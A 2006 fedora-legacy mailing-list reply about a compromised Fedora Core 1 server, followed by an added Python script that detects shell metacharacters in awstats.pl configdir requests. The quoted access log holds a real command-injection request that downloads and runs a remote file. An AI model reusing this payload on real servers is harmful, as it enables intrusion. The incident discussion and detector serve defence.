Re: slapper worm

Hi Mike,

> >  403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip
> >z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1"
> >  404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)"
> >
> > These "scripz" files end up going into /tmp, being compiled with
> > gcc, renamed to "httpd" and run as that.
> >
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the packages to
> > fix/block slapper from an FC1 machine?
> >
> > Michael.
> >
>  
> 
> Are you sure it's using an SSL exploit?
> 
> http://www.lurhq.com/slapperv2.html
> 
> Regards, Mike Klinke

No, I'm not sure. Reading through the link above, it does seem that you've hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when the 3rd one was). The FC1 machine that
was, had the xmlrpc.php file which I've now removed.

Michael.

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
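
The requests quoted in this thread put shell metacharacters into the `configdir` parameter of `awstats.pl`. As an added example that is not part of the original messages, the script below flags such requests in an Apache access log and reports the response status for each; the log lines are constructed samples using documentation IP addresses, and the names `configdir_value` and `scan` are this example's own.

```python
import re
from urllib.parse import unquote

# Apache common/combined log prefix: ip, timestamp, request line, status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Characters a directory path never needs but a shell acts on
SHELL_META = re.compile(r'[|;`$&<>\n]')

def configdir_value(target):
    """Decoded configdir parameter of an awstats.pl request, else None."""
    path, _, query = target.partition('?')
    if not path.lower().endswith('/awstats.pl'):
        return None
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if name.lower() == 'configdir':
            return unquote(value)  # decode %7C, %3b, ... before matching
    return None

def scan(lines):
    """Return (ip, timestamp, status, configdir) for each suspicious request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        value = configdir_value(m['target'])
        if value is not None and SHELL_META.search(value):
            hits.append((m['ip'], m['ts'], int(m['status']), value))
    return hits

# Constructed sample lines (not taken from the thread)
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [23/Jan/2006:08:40:11 +1100] "GET /cgi-bin/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Jan/2006:09:02:47 +1100] "GET /awstats/awstats.pl?configdir=%7Cecho%20YYY%7C HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [23/Jan/2006:09:10:00 +1100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, ts, status, value in scan(SAMPLE_LOG):
        # 2xx means awstats.pl exists and answered; 403/404 means it did not run
        note = 'script answered, inspect host' if 200 <= status < 300 else 'rejected or absent'
        print(f'{ts} {ip} status={status} ({note}) configdir={value!r}')
```
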
